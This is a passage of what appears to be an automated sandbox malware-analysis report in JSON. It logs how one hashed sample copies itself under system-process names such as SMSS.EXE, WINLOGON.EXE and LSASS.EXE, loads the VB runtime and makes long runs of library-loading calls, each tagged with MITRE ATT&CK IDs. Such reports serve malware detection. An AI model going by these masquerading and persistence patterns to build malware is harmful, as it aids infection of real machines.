\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.scr to new location C:\\4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005240)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004972)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002712)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005440)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000640)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000640)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000640)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000640)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000640)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000640)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004996)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005068)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005068)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005068)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005068)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005068)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005068)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003392)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003520)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002640)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000920)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000920)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004800)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004800)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004624)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004624)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002732)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002732)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002732)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002732)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002732)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005620)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000948)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000948)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000948)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000948)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000948)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000948)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005820)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005820)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001600)\n 